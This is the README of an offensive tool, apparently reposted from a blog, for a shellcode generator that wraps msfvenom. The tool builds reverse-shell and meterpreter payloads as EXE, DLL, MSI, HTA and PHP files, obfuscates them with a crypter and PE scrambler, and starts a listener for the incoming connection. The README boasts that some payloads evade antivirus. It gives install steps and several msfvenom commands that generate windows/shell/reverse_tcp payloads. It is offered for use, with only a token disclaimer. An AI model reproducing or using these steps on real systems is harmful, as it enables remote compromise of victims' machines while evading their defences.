[ DISCLAMER ]
The author does not hold any responsibility about the bad use of this script, remember that attacking targets without prior concent its ilegal and punish by law.
Latest change v1.0.8:
+ Biprodeep python execution example
+ 0entropy powershell
+ output folder fix
+ misspeeling fixes
The script will use msfvenom (metasploit) to generate shellcode in diferent formats ( c | python | ruby | dll | msi | hta-psh ), injects the shellcode generated into one funtion (example: python) “the python funtion will execute the shellcode in ram” and uses compilers like: gcc (gnu cross compiler) or mingw32 or pyinstaller to build the executable file, also starts a multi-handler to recibe the remote connection (reverse shell or meterpreter session).
—
‘shellcode generator’ tool reproduces some of the technics used by Veil-Evasion framework, unicorn.py, powersploit, etc,etc,etc..”P.S. some payloads are undetectable by AV soluctions yes!!!” one of the reazons for that its the use of a funtion to execute the 2º stage of shell/meterpreter directly into targets ram.
DEPENDENCIES :
— “crisp.sh will download/install all dependencies as they are needed”
— Zenity | Metasploit | GCC (compiler) | Pyinstaller (python-to-exe module)
— python-pip (pyinstaller downloader) | mingw32 (compile .EXE executables)
— pyherion.py (crypter) | PEScrambler.exe (PE obfuscator/scrambler.)
Features:
option – build – target – format – output
—
1 – shellcode – unix – C – C
2 – shellcode – windows – C – DLL
3 – shellcode – windows – DLL – DLL
4 – shellcode – windows – PYTHON – PYTHON/EXE
5 – shellcode – windows – C – EXE
6 – shellcode – windows – MSIEXEC – MSI
7 – shellcode – windows – RUBY – RUBY
8 – shellcode – windows – HTA-PSH – HTA
9 – shellcode – webserver – PHP – PHP
—
V – msfvenom exercises console
F – FAQ (frequent ask questions)
R – exit shellcode generator
Usage:
git clone git://git.code.sf.net/p/crisp-shellcode-generator/shell crisp-shellcode-generator-shell cd crisp-shellcode-generator-shell ./venom.sh UPdates: cd cd crisp-shellcode-generator-shell git pull [ HOW DOES MSFVENOM ACTUALLY BUILDS SHELLCODE? ] The default way to generate a windows binarie payload (.exe) using msfvenom its achieved through -f flag (Output format) msfvenom -p payload-name LHOST=127.0.0.1 LPORT=666 -f exe -o payload.exe But msfvenom allow us to build shellcode in diferent formats like: asp, aspx, aspx-exe, dll, elf, exe, exe-small, hta-psh macho, osx-app, psh, vba, vba-exe, vba-psh, vbs, bash, c java, perl, powershell, python, ruby, sh, vbscript. The complete list can be accessed using the follow command: sudo msfvenom --help-formats now lets generate a simple shellcode to windows/shell/reverse_tcp chosing powershell as output format "note that we will not use the flag -o (Save the payload) option, this way the shellcode generated will only displays in current terminal windows". Using powershell as output format: msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f powershell Using java as output format: msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f java Using hex as output format: msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f hex
our post before
Source :http://sourceforge.net/p/crisp-shellcode-generator/